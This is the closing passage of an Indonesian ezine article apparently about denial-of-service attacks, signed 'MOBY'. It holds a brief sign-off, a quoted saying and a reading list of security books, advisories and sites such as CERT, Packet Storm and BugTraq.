	gelap', kamu tahu pemilik nomor 08157190*** !. "Ka .. tidak baik marah 
	kepada seseorang yang datang dengan kasih sayang :)"

	"KALAU AKU SEORANG ATEIS, MAKA AKAN AKU KATAKAN:
		'TEMPAT YANG PALING AMAN ADALAH PETI MATI'
	TAPI TERNYATA AKU SALAH !!"
						[MOBY]

 
Bacaan lanjutan / referensi:
	
	[1] Kejahatan Internet, Trik Aplikasi dan Tip Penanggulangannya.
	    R. Kresno Aji, Agus Hartanto, Deni Siswanto, Tommy Chandra Wiratama.
	    Elexmedia Komputindo, ISBN: 979-20-3249-5
	[2] 7 Cara Isengi Apache dan kiat mengatasinya.
	    Steven Haryanto, Masterweb Magazine Oktober 2001
	[3] Introduction to Denial of Service
	    Hans Husman, t95hhu@student.tdb.uu.se
	[4] CERT ADVISORIES.
	    www.cert.org
	[5] Packet Storm Security
	    http://packetstormsecurity.nl
	[6] BugTraq
	    www.securityfocus.com
	        
 sumber : http://ezine.echo.or.id/ezine2/ddos~Moby.txt